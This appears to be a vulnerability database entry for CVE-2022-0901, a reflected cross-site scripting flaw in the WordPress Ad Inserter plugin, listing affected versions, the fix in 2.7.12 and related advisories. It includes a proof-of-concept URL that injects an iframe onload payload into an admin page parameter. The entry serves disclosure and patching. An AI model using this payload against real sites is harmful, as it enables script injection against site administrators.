Lucene search
Taurus Omar1337DAY-ID-37598HistoryApr 07, 2022 - 12:00 a.m.
WordPress Ad Inserter Plugin < 2.7.12 - Cross Site Scripting Vulnerability
2022-04-0700:00:00
Taurus Omar
0day.today
233
wordpress
cross site scripting
vulnerability
reflected
browser
xss
owasp a7
cwe-79
fixed
wpscan
EPSS
0.001
Percentile
50.5%
Tittle:
WordPress Plugin Ad Inserter < 2.7.12 - Reflected Cross-Site Scripting
References:
CVE-2022-0901
Author:
Taurus Omar
Description:
The plugins do not sanitise and escape the REQUEST_URI before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters
Affects Plugins:
ad-inserter
ad-inserter-pro
Fixed in version 2.7.12
Proof of Concept:
In a browser which does not encode characters:
https://example.com/wp-admin/options-general.php?page=ad-inserter.php&start=2&tab=\"><iframe/onload=alert(1)></iframe>
Classification
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79
wpScan:
https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba
Related
nvd
nvd
CVE-2022-0901
2022-04-04 16:15:10
wpvulndb
wpvulndb
Ad Inserter < 2.7.12 - Reflected Cross-Site Scripting
2022-03-14 00:00:00
openvas
openvas
WordPress Ad Inserter Plugin < 2.7.12 XSS Vulnerability
2022-04-21 00:00:00
prion
prion
Cross site scripting
2022-04-04 16:15:00
patchstack
patchstack
packetstorm
packetstorm
WordPress Ad Inserter Cross Site Scripting
2022-04-07 00:00:00
wpexploit
wpexploit
Ad Inserter < 2.7.12 - Reflected Cross-Site Scripting
2022-03-14 00:00:00
cvelist
cvelist
CVE-2022-0901 Ad Inserter < 2.7.12 - Reflected Cross-Site Scripting
2022-04-04 15:35:58
cve
cve
CVE-2022-0901
2022-04-04 16:15:10